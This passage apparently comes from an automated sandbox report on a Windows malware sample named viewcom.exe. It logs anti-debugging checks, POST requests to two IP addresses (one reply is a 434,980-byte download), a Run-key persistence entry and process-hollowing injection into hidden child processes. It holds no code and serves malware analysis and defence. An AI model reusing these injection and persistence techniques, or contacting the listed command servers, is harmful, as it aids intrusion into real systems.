| Parent PID | 0xb8c (c:\users\atveydl98z\appdata\local\microsoft\windows\viewcom.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | ZJEWV7F\ATVeyDl98Z |
| Groups |
|
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
B9C
0x
BA0
0x
BAC
0x
BB0
0x
BB4
0x
C48
0x
C4C
0x
C50
0x
C54
0x
C58
0x
C5C
0x
C60
0x
C64
0x
C68
0x
C6C
0x
C88
0x
C8C
|
| Filename | File Size | Hash Values | YARA Match | Actions |
|---|---|---|---|---|
| c:\programdata\9f1b.tmp | 0.00 KB (0 bytes) |
MD5:
d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
|
|
| c:\programdata\9f1c.tmp | 0.00 KB (0 bytes) |
MD5:
d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
|
|
| c:\programdata\9f2d.tmp | 0.00 KB (0 bytes) |
MD5:
d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
|
|
| c:\programdata\9f1c.tmp | 0.11 KB (112 bytes) |
MD5:
36427ecb2a0faf13af3047c51b29f9c5
SHA1: 9a3fb26927a7aa81255cf8abcc1f1c3e38f28c4f SHA256: ea156f649bb1180b32c6d5be76c0969941ec76d1fface734f401b5327ac57345 |
|
|
| c:\programdata\9f1b.tmp | 0.08 KB (84 bytes) |
MD5:
fdf031de948302c61dede50cd61fa096
SHA1: d926af57565c1448dd81009ed90e324575e9b481 SHA256: 370497cb330134ed7954bbedd18db1a0b34a85bc821b857624183a8d139b95d5 |
|
|
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Module | Get Address | function = VirtualAlloc, ordinal = 0, address_out = 0x12fd10 |
|
1 | |
| Module | Get Address | function = VirtualAlloc, ordinal = 0, address_out = 0x12fd50 |
|
1 | |
| Module | Get Address | function = LoadLibraryA, ordinal = 0, address_out = 0x12fd6c |
|
1 | |
| Module | Get Address | function = GetProcAddress, ordinal = 0, address_out = 0x12fd6c |
|
1 | |
| Module | Get Address | function = VirtualAlloc, ordinal = 0, address_out = 0x12fd6c |
|
1 | |
| Module | Get Address | function = VirtualProtect, ordinal = 0, address_out = 0x12fd6c |
|
1 | |
| Module | Get Address | function = UnmapViewOfFile, ordinal = 0, address_out = 0x12fd6c |
|
1 | |
| Module | Get Address | function = AddVectoredExceptionHandler, ordinal = 0, address_out = 0x12fd6c |
|
1 | |
| Module | Get Address | function = RemoveVectoredExceptionHandler, ordinal = 0, address_out = 0x12fd6c |
|
1 | |
| Module | Load | module_name = ntdll.dll, base_address = 0x775c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\ntdll.dll, function = cos, address_out = 0x77607400 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\ntdll.dll, function = sin, address_out = 0x775f41c0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\ntdll.dll, function = strchr, address_out = 0x77607690 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x76350000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = LoadLibraryA, address_out = 0x763a395c |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = lstrcmpA, address_out = 0x76388c59 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = CreateFileA, address_out = 0x7639cee8 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = CloseHandle, address_out = 0x7639ca7c |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = GetModuleHandleA, address_out = 0x7639cf41 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = GetModuleFileNameA, address_out = 0x763a33f6 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = GetComputerNameA, address_out = 0x76386ba9 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = GetComputerNameExA, address_out = 0x763df41f |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = GetCommandLineA, address_out = 0x763a98ff |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = FreeConsole, address_out = 0x763fbfde |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = VirtualAlloc, address_out = 0x763a2fb6 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = IsDebuggerPresent, address_out = 0x76393ea8 |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x76030000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\advapi32.dll, function = GetUserNameA, address_out = 0x7605a4b4 |
|
1 | |
| Module | Load | module_name = SHLWAPI.dll, base_address = 0x760e0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\shlwapi.dll, function = StrStrIA, address_out = 0x760ed250 |
|
1 | |
| Debug | Check for Presence | c:\users\atveydl98z\appdata\local\microsoft\windows\viewcom.exe |
|
249 | |
| Module | Load | module_name = winhttp.dll, base_address = 0x6f600000 |
|
1 | |
| Module | Load | module_name = urlmon.dll, base_address = 0x75ce0000 |
|
1 | |
| Module | Load | module_name = wininet.dll, base_address = 0x771e0000 |
|
1 | |
| Module | Load | module_name = winhttp.dll, base_address = 0x6f600000 |
|
1 | |
| Module | Load | module_name = urlmon.dll, base_address = 0x75ce0000 |
|
1 | |
| Module | Load | module_name = wininet.dll, base_address = 0x771e0000 |
|
1 | |
| Module | Load | module_name = winhttp.dll, base_address = 0x6f600000 |
|
1 | |
| Module | Load | module_name = urlmon.dll, base_address = 0x75ce0000 |
|
1 | |
| Module | Load | module_name = wininet.dll, base_address = 0x771e0000 |
|
1 | |
| Module | Load | module_name = winhttp.dll, base_address = 0x6f600000 |
|
1 | |
| Module | Load | module_name = urlmon.dll, base_address = 0x75ce0000 |
|
1 | |
| Module | Load | module_name = wininet.dll, base_address = 0x771e0000 |
|
1 | |
| Module | Load | module_name = winhttp.dll, base_address = 0x6f600000 |
|
1 | |
| Module | Load | module_name = urlmon.dll, base_address = 0x75ce0000 |
|
1 | |
| Module | Load | module_name = wininet.dll, base_address = 0x771e0000 |
|
1 | |
| Module | Load | module_name = winhttp.dll, base_address = 0x6f600000 |
|
1 | |
| Module | Load | module_name = urlmon.dll, base_address = 0x75ce0000 |
|
1 | |
| Module | Load | module_name = wininet.dll, base_address = 0x771e0000 |
|
1 | |
| System | Get Computer Name | result_out = ZJEWV7F |
|
1 | |
| System | Get Computer Name | result_out = ZjEwV7f, type = ComputerNameDnsHostname |
|
1 | |
| File | Create | filename = C:\email.doc, desired_access = GENERIC_READ |
|
1 | |
| File | Create | filename = C:\a\foobar.bmp, desired_access = GENERIC_READ |
|
1 | |
| Module | Get Handle | module_name = c:\users\atveyd~1\appdata\local\temp\38763.exe, base_address = 0x400000 |
|
1 | |
| Module | Get Filename | module_name = c:\users\atveyd~1\appdata\local\temp\38763.exe, process_name = c:\users\atveydl98z\appdata\local\microsoft\windows\viewcom.exe, file_name_orig = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.exe, size = 259 |
|
1 | |
| Debug | Check for Presence | c:\users\atveydl98z\appdata\local\microsoft\windows\viewcom.exe |
|
249 | |
| Module | Load | module_name = winhttp.dll, base_address = 0x6f600000 |
|
1 | |
| Module | Load | module_name = urlmon.dll, base_address = 0x75ce0000 |
|
1 | |
| Module | Load | module_name = wininet.dll, base_address = 0x771e0000 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x76350000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = WTSGetActiveConsoleSessionId, address_out = 0x7638480b |
|
1 | |
| Module | Get Filename | process_name = c:\users\atveydl98z\appdata\local\microsoft\windows\viewcom.exe, file_name_orig = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.exe, size = 260 |
|
1 | |
| Mutex | Create | mutex_name = M68B1B0D0 |
|
1 | |
| Module | Load | module_name = advapi32.dll, base_address = 0x76030000 |
|
1 | |
| Module | Load | module_name = ole32.dll, base_address = 0x77460000 |
|
1 | |
| Module | Load | module_name = shell32.dll, base_address = 0x764f0000 |
|
1 | |
| Module | Load | module_name = crypt32.dll, base_address = 0x757b0000 |
|
1 | |
| Module | Load | module_name = urlmon.dll, base_address = 0x75ce0000 |
|
1 | |
| Module | Load | module_name = userenv.dll, base_address = 0x74dc0000 |
|
1 | |
| Module | Load | module_name = wininet.dll, base_address = 0x771e0000 |
|
1 | |
| Module | Load | module_name = wtsapi32.dll, base_address = 0x741a0000 |
|
1 | |
| System | Get Info | type = Windows Directory, result_out = C:\Windows |
|
1 | |
| Module | Get Filename | process_name = c:\users\atveydl98z\appdata\local\microsoft\windows\viewcom.exe, file_name_orig = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.exe, size = 260 |
|
1 | |
| Service | Open Manager | database_name = SERVICES_ACTIVE_DATABASE |
|
1 | |
| File | Create | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.exe, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Module | Create Mapping | module_name = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.exe, filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.exe, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.exe, process_name = c:\users\atveydl98z\appdata\local\microsoft\windows\viewcom.exe, desired_access = FILE_MAP_READ |
|
1 | |
| File | Get Info | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.exe, type = size |
|
1 | |
| Module | Unmap | process_name = c:\users\atveydl98z\appdata\local\microsoft\windows\viewcom.exe |
|
1 | |
| System | Get Computer Name | result_out = ZJEWV7F |
|
1 | |
| Mutex | Create | mutex_name = Global\I40F77A1B |
|
1 | |
| Mutex | Create | mutex_name = Global\M40F77A1B |
|
1 | |
| Mutex | Release | mutex_name = Global\I40F77A1B |
|
1 |
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Module | Get Filename | process_name = c:\users\atveydl98z\appdata\local\microsoft\windows\viewcom.exe, file_name_orig = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.exe, size = 260 |
|
1 | |
| System | Get Computer Name | result_out = ZJEWV7F |
|
1 | |
| File | Create | filename = C:\ProgramData\9F1C.tmp, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\ProgramData\9F1C.tmp, type = size |
|
1 | |
| File | Create | filename = C:\ProgramData\9F1B.tmp, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\ProgramData\9F1B.tmp, type = size |
|
1 | |
| Module | Create Mapping | module_name = C:\ProgramData\9F1B.tmp, filename = C:\ProgramData\9F1B.tmp, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | C:\ProgramData\9F1B.tmp, process_name = c:\users\atveydl98z\appdata\local\microsoft\windows\viewcom.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\atveydl98z\appdata\local\microsoft\windows\viewcom.exe |
|
1 | |
| Inet | Open Session | user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG |
|
1 | |
| Inet | Open Connection | protocol = HTTP, server_name = 185.82.23.28, server_port = 443 |
|
1 | |
| Inet | Open HTTP Request | http_verb = POST, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD |
|
1 | |
| Inet | Send HTTP Request | headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 185.82.23.28 |
|
1 | |
| Inet | Query HTTP Info | flags = HTTP_QUERY_CONTENT_TYPE, HTTP_QUERY_CONTENT_TRANSFER_ENCODING, HTTP_QUERY_LINK, HTTP_QUERY_FLAG_NUMBER, size_out = 4 |
|
1 | |
| Inet | Query HTTP Info | flags = HTTP_QUERY_CONTENT_TYPE, HTTP_QUERY_CONTENT_DESCRIPTION, HTTP_QUERY_FLAG_NUMBER, size_out = 4 |
|
1 | |
| Inet | Read Response | size = 148, size_out = 148 |
|
1 | |
| Inet | Read Response | size = 0, size_out = 0 |
|
1 | |
| Inet | Close Session |
|
1 | ||
| Inet | Close Session |
|
1 | ||
| Inet | Close Session |
|
1 | ||
| File | Create | filename = C:\ProgramData\9F2D.tmp, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 |
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Module | Get Filename | process_name = c:\users\atveydl98z\appdata\local\microsoft\windows\viewcom.exe, file_name_orig = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.exe, size = 260 |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| System | Get Info | type = Hardware Information |
|
1 | |
| Inet | Open Session | user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG |
|
1 | |
| Inet | Open Connection | protocol = HTTP, server_name = 65.99.230.27, server_port = 443 |
|
1 | |
| Inet | Open HTTP Request | http_verb = POST, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD |
|
1 | |
| Inet | Send HTTP Request | headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 65.99.230.27 |
|
1 | |
| Inet | Query HTTP Info | flags = HTTP_QUERY_CONTENT_TYPE, HTTP_QUERY_CONTENT_TRANSFER_ENCODING, HTTP_QUERY_LINK, HTTP_QUERY_FLAG_NUMBER, size_out = 4 |
|
1 | |
| Inet | Query HTTP Info | flags = HTTP_QUERY_CONTENT_TYPE, HTTP_QUERY_CONTENT_DESCRIPTION, HTTP_QUERY_FLAG_NUMBER, size_out = 4 |
|
1 | |
| Inet | Read Response | size = 434980, size_out = 434980 |
|
1 | |
| Inet | Read Response | size = 0, size_out = 0 |
|
1 | |
| Inet | Close Session |
|
1 | ||
| Inet | Close Session |
|
1 | ||
| Inet | Close Session |
|
1 | ||
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run, value_name = viewcom, data = "C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.exe", size = 132, type = REG_SZ |
|
1 | |
| Inet | Open Session | user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG |
|
1 | |
| Inet | Open Connection | protocol = HTTP, server_name = 65.99.230.27, server_port = 443 |
|
1 | |
| Inet | Open HTTP Request | http_verb = POST, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD |
|
1 | |
| Inet | Send HTTP Request | headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 65.99.230.27 |
|
1 | |
| Inet | Query HTTP Info | flags = HTTP_QUERY_CONTENT_TYPE, HTTP_QUERY_CONTENT_TRANSFER_ENCODING, HTTP_QUERY_LINK, HTTP_QUERY_FLAG_NUMBER, size_out = 4 |
|
1 | |
| Inet | Query HTTP Info | flags = HTTP_QUERY_CONTENT_TYPE, HTTP_QUERY_CONTENT_DESCRIPTION, HTTP_QUERY_FLAG_NUMBER, size_out = 4 |
|
1 | |
| Inet | Read Response | size = 148, size_out = 148 |
|
1 | |
| Inet | Read Response | size = 0, size_out = 0 |
|
1 | |
| Inet | Close Session |
|
1 | ||
| Inet | Close Session |
|
1 | ||
| Inet | Close Session |
|
1 | ||
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run, value_name = viewcom, data = "C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.exe", size = 132, type = REG_SZ |
|
1 | |
| Module | Get Filename | process_name = c:\users\atveydl98z\appdata\local\microsoft\windows\viewcom.exe, file_name_orig = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.exe, size = 260 |
|
1 | |
| Process | Create | process_name = "C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.exe" "C:\ProgramData\9F2D.tmp", os_pid = 0xc80, creation_flags = CREATE_SUSPENDED, show_window = SW_HIDE |
|
1 | |
| Memory | Get Info | "C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.exe" "C:\ProgramData\9F2D.tmp", address = 0x400000, allocation_type = MEM_RESET_UNDO, protection_out = PAGE_READONLY, size_out = 4096 |
|
1 | |
| Memory | Protect | process_name = "C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.exe" "C:\ProgramData\9F2D.tmp", address = 0x400000, protection = PAGE_EXECUTE_READWRITE, size = 102400 |
|
1 | |
| Module | Unmap | process_name = "C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.exe" "C:\ProgramData\9F2D.tmp" |
|
1 | |
| Memory | Allocate | process_name = "C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.exe" "C:\ProgramData\9F2D.tmp", address = 0x400000, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 102400 |
|
1 | |
| Thread | Get Context | process_name = c:\users\atveydl98z\appdata\local\microsoft\windows\viewcom.exe, os_tid = 0xbb0 |
|
1 | |
| Memory | Write | process_name = "C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.exe" "C:\ProgramData\9F2D.tmp", address = 0x400000, size = 102400 |
|
1 | |
| Memory | Write | process_name = "C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.exe" "C:\ProgramData\9F2D.tmp", address = 0x7ffda008, size = 4 |
|
1 | |
| Thread | Set Context | process_name = c:\users\atveydl98z\appdata\local\microsoft\windows\viewcom.exe, os_tid = 0xbb0 |
|
1 | |
| Thread | Resume | process_name = c:\users\atveydl98z\appdata\local\microsoft\windows\viewcom.exe, os_tid = 0xbb0 |
|
1 |
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Module | Get Filename | process_name = c:\users\atveydl98z\appdata\local\microsoft\windows\viewcom.exe, file_name_orig = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.exe, size = 260 |
|
1 | |
| Process | Create | process_name = "C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.exe" /scomma "C:\ProgramData\9F1B.tmp", os_pid = 0xc70, creation_flags = CREATE_SUSPENDED, show_window = SW_HIDE |
|
1 | |
| Memory | Get Info | "C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.exe" /scomma "C:\ProgramData\9F1B.tmp", address = 0x400000, allocation_type = MEM_RESET_UNDO, protection_out = PAGE_READONLY, size_out = 4096 |
|
1 | |
| Memory | Protect | process_name = "C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.exe" /scomma "C:\ProgramData\9F1B.tmp", address = 0x400000, protection = PAGE_EXECUTE_READWRITE, size = 114688 |
|
1 | |
| Module | Unmap | process_name = "C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.exe" /scomma "C:\ProgramData\9F1B.tmp" |
|
1 | |
| Memory | Allocate | process_name = "C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.exe" /scomma "C:\ProgramData\9F1B.tmp", address = 0x400000, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 114688 |
|
1 | |
| Thread | Get Context | process_name = c:\users\atveydl98z\appdata\local\microsoft\windows\viewcom.exe, os_tid = 0xc48 |
|
1 | |
| Memory | Write | process_name = "C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.exe" /scomma "C:\ProgramData\9F1B.tmp", address = 0x400000, size = 114688 |
|
1 | |
| Memory | Write | process_name = "C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.exe" /scomma "C:\ProgramData\9F1B.tmp", address = 0x7ffdd008, size = 4 |
|
1 | |
| Thread | Set Context | process_name = c:\users\atveydl98z\appdata\local\microsoft\windows\viewcom.exe, os_tid = 0xc48 |
|
1 | |
| Thread | Resume | process_name = c:\users\atveydl98z\appdata\local\microsoft\windows\viewcom.exe, os_tid = 0xc48 |
|
1 |
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Module | Get Filename | process_name = c:\users\atveydl98z\appdata\local\microsoft\windows\viewcom.exe, file_name_orig = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.exe, size = 260 |
|
1 | |
| Process | Create | process_name = "C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.exe" /scomma "C:\ProgramData\9F1C.tmp", os_pid = 0xc78, creation_flags = CREATE_SUSPENDED, show_window = SW_HIDE |
|
1 | |
| Memory | Get Info | "C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.exe" /scomma "C:\ProgramData\9F1C.tmp", address = 0x400000, allocation_type = MEM_RESET_UNDO, protection_out = PAGE_READONLY, size_out = 4096 |
|
1 | |
| Memory | Protect | process_name = "C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.exe" /scomma "C:\ProgramData\9F1C.tmp", address = 0x400000, protection = PAGE_EXECUTE_READWRITE, size = 372736 |
|
1 | |
| Module | Unmap | process_name = "C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.exe" /scomma "C:\ProgramData\9F1C.tmp" |
|
1 | |
| Memory | Allocate | process_name = "C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.exe" /scomma "C:\ProgramData\9F1C.tmp", address = 0x400000, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 372736 |
|
1 | |
| Thread | Get Context | process_name = c:\users\atveydl98z\appdata\local\microsoft\windows\viewcom.exe, os_tid = 0xc58 |
|
1 | |
| Memory | Write | process_name = "C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.exe" /scomma "C:\ProgramData\9F1C.tmp", address = 0x400000, size = 372736 |
|
1 | |
| Memory | Write | process_name = "C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.exe" /scomma "C:\ProgramData\9F1C.tmp", address = 0x7ffd8008, size = 4 |
|
1 | |
| Thread | Set Context | process_name = c:\users\atveydl98z\appdata\local\microsoft\windows\viewcom.exe, os_tid = 0xc58 |
|
1 | |
| Thread | Resume | process_name = c:\users\atveydl98z\appdata\local\microsoft\windows\viewcom.exe, os_tid = 0xc58 |
|
1 |
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Module | Load | module_name = advapi32.dll, base_address = 0x76030000 |
|
1 | |
| Module | Load | module_name = crypt32.dll, base_address = 0x757b0000 |
|
1 | |
| Module | Load | module_name = shell32.dll, base_address = 0x764f0000 |
|
1 | |
| Module | Load | module_name = urlmon.dll, base_address = 0x75ce0000 |
|
1 | |
| Module | Load | module_name = userenv.dll, base_address = 0x74dc0000 |
|
1 | |
| Module | Load | module_name = wininet.dll, base_address = 0x771e0000 |
|
1 | |
| Module | Load | module_name = wtsapi32.dll, base_address = 0x741a0000 |
|
1 | |
| File | Create Temp File | filename = C:\ProgramData\9F1B.tmp, path = C:\ProgramData |
|
1 | |
| File | Delete | filename = C:\ProgramData\9F1B.tmp |
|
2 |
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Module | Load | module_name = advapi32.dll, base_address = 0x76030000 |
|
1 | |
| Module | Load | module_name = crypt32.dll, base_address = 0x757b0000 |
|
1 | |
| Module | Load | module_name = shell32.dll, base_address = 0x764f0000 |
|
1 | |
| Module | Load | module_name = urlmon.dll, base_address = 0x75ce0000 |
|
1 | |
| Module | Load | module_name = userenv.dll, base_address = 0x74dc0000 |
|
1 | |
| Module | Load | module_name = wininet.dll, base_address = 0x771e0000 |
|
1 | |
| Module | Load | module_name = wtsapi32.dll, base_address = 0x741a0000 |
|
1 | |
| File | Create Temp File | filename = C:\ProgramData\9F1C.tmp, path = C:\ProgramData |
|
1 | |
| File | Delete | filename = C:\ProgramData\9F1C.tmp |
|
2 |
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Module | Load | module_name = advapi32.dll, base_address = 0x76030000 |
|
1 | |
| Module | Load | module_name = crypt32.dll, base_address = 0x757b0000 |
|
1 | |
| Module | Load | module_name = shell32.dll, base_address = 0x764f0000 |
|
1 | |
| Module | Load | module_name = urlmon.dll, base_address = 0x75ce0000 |
|
1 | |
| Module | Load | module_name = userenv.dll, base_address = 0x74dc0000 |
|
1 | |
| Module | Load | module_name = wininet.dll, base_address = 0x771e0000 |
|
1 | |
| Module | Load | module_name = wtsapi32.dll, base_address = 0x741a0000 |
|
1 | |
| File | Create Temp File | filename = C:\ProgramData\9F2D.tmp, path = C:\ProgramData |
|
1 | |
| File | Delete | filename = C:\ProgramData\9F2D.tmp |
|
1 | |
| File | Delete | filename = C:\ProgramData\9F2D.tmp |
|
1 |
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Module | Load | module_name = advapi32.dll, base_address = 0x76030000 |
|
1 | |
| Module | Load | module_name = mpr.dll, base_address = 0x70f40000 |
|
1 | |
| Module | Load | module_name = netapi32.dll, base_address = 0x73eb0000 |
|
1 | |
| Module | Load | module_name = SAMCLI.DLL, base_address = 0x73800000 |
|
1 | |
| Module | Load | module_name = userenv.dll, base_address = 0x74dc0000 |
|
1 | |
| Module | Load | module_name = wtsapi32.dll, base_address = 0x741a0000 |
|
1 |
| Information | Value |
|---|---|
| ID | #8 |
| File Name | c:\users\atveydl98z\appdata\local\microsoft\windows\viewcom.exe |
| Command Line | "C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.exe" /scomma "C:\ProgramData\9F1B.tmp" |
| Initial Working Directory | C:\Users\ATVeyDl98Z\Desktop\ |
| Monitor | Start Time: 00:01:18, Reason: Child Process |
| Unmonitor | End Time: 00:02:34, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:16 |
| Information | Value |
|---|---|
| PID | 0xc70 |
| Parent PID | 0xb98 (c:\users\atveydl98z\appdata\local\microsoft\windows\viewcom.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | ZJEWV7F\ATVeyDl98Z |
| Groups |
|
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
C74
0x
CBC
|
| Injection Type | Source Process | Source Os Thread ID | Injection Info | Success | Count | Logfile |
|---|---|---|---|---|---|---|
| Modify Memory | #6: c:\users\atveydl98z\appdata\local\microsoft\windows\viewcom.exe | 0xc48 | address = 0x400000, size = 114688 |
|
1 | |
| Modify Memory | #6: c:\users\atveydl98z\appdata\local\microsoft\windows\viewcom.exe | 0xc48 | address = 0x7ffdd008, size = 4 |
|
1 | |
| Modify Control Flow | #6: c:\users\atveydl98z\appdata\local\microsoft\windows\viewcom.exe | 0xc48 | os_tid = 0xc74, address = 0x0 |
|
1 |
| Category | Operation | Information | Success | Count | Logfile |
